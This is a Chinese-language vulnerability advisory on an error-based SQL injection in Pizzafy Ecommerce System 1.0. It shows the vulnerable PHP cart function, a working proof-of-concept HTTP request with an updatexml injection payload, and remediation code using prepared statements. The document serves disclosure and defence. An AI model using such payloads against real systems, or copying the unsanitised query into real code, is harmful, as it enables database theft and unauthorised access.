# Pizzafy Ecommerce System 1.0 SQL注入漏洞总结 ## 漏洞概述 * **受影响版本**: Pizzafy Ecommerce System 1.0 * **漏洞类型**: 基于错误的SQL注入 (Error-Based SQL Injection) * **严重程度**: HIGH * **漏洞位置**: `/pizzafy/admin/ajax.php?action=get_cart_items&id=6` * **漏洞描述**: 在 `select` 功能中,`id` 参数和 `user_id` 列未进行适当清理,允许攻击者向后端数据库查询中注入恶意SQL命令。 ## 影响范围 * **机密性**: 完整数据库架构和用户凭据泄露。 * **完整性**: 未经授权删除或修改记录。 * **可用性**: 大规模删除导致服务拒绝。 * **权限提升**: 会话劫持和管理员访问权限。 ## 概念验证 (PoC) **1. 漏洞代码 (Vulnerable Code)** ```php public function get_cart_items() { if(!isset($_SESSION['login_user_id'])) { return ['items' => []]; } $user_id = $_SESSION['login_user_id']; if (isset($_GET['id'])) { $user_id = $_GET['id']; } $sql = "SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = $user_id"; $result = $this->conn->query($sql); if (!$result) { return ['items' => [], 'error' => $this->conn->error]; } $items = []; $total = 0; if ($result && $result->num_rows > 0) { while($row = $result->fetch_assoc()) { $subtotal = $row['price'] * $row['qty']; $total += $subtotal; $items[] = [ 'cart_id' => $row['cart_id'], 'product_id' => $row['product_id'], 'name' => $row['name'], 'qty' => $row['qty'], 'price' => (float)$row['price'], 'subtotal' => (float)$subtotal ]; } } return ['items' => $items, 'total' => $total]; } ``` **2. 利用代码 (Exploit Payload)** ```http GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6%20AND%20updatexml(1,concat(0x7e,database()),1)%23 HTTP/1.1 Host: localhost sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/index.php?page=home Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jeju15623h3yxadwq12jpr94i Connection: close ``` ## 修复方案 **1. 修复代码 (Remediation Code)** ```php public function get_cart_items() { if(!isset($_SESSION['login_user_id'])) { return ['items' => []]; } $user_id = (int)$_SESSION['login_user_id']; // Remove the code // if (isset($_GET['id'])) { // $user_id = $_GET['id']; // } $stmt = $this->conn->prepare("SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = ?"); $stmt->bind_param("i", $user_id); $stmt->execute(); $result = $stmt->get_result(); if (!$result) { error_log("Erro em get_cart_items: " . $this->conn->error); return ['items' => []]; } $items = []; $total = 0; if ($result && $result->num_rows > 0) { while($row = $result->fetch_assoc()) { $subtotal = $row['price'] * $row['qty']; $total += $subtotal; $items[] = [ 'cart_id' => $row['cart_id'], 'product_id' => $row['product_id'], 'name' => $row['name'], 'qty' => $row['qty'], 'price' => (float)$row['price'], 'subtotal' => (float)$subtotal ]; } } return ['items' => $items, 'total' => $total]; } ``` **2. 缓解建议** 1. **使用预处理语句**: 采用参数化查询以防止SQL注入。 2. **输入验证**: 验证并清理 `id` 参数和 `id` 列,仅允许预期值。 3. **数据库权限**: 限制数据库用户权限,以限制SQL注入的潜在损害。 4. **监控和日志记录**: 跟踪和警报异常模式,如SQL查询或重复访问尝试。 5. **安全测试**: 执行定期渗透测试和代码审查以识别和缓解漏洞。 6. **错误处理**: 避免在响应中暴露数据库相关错误,这可能会帮助攻击者。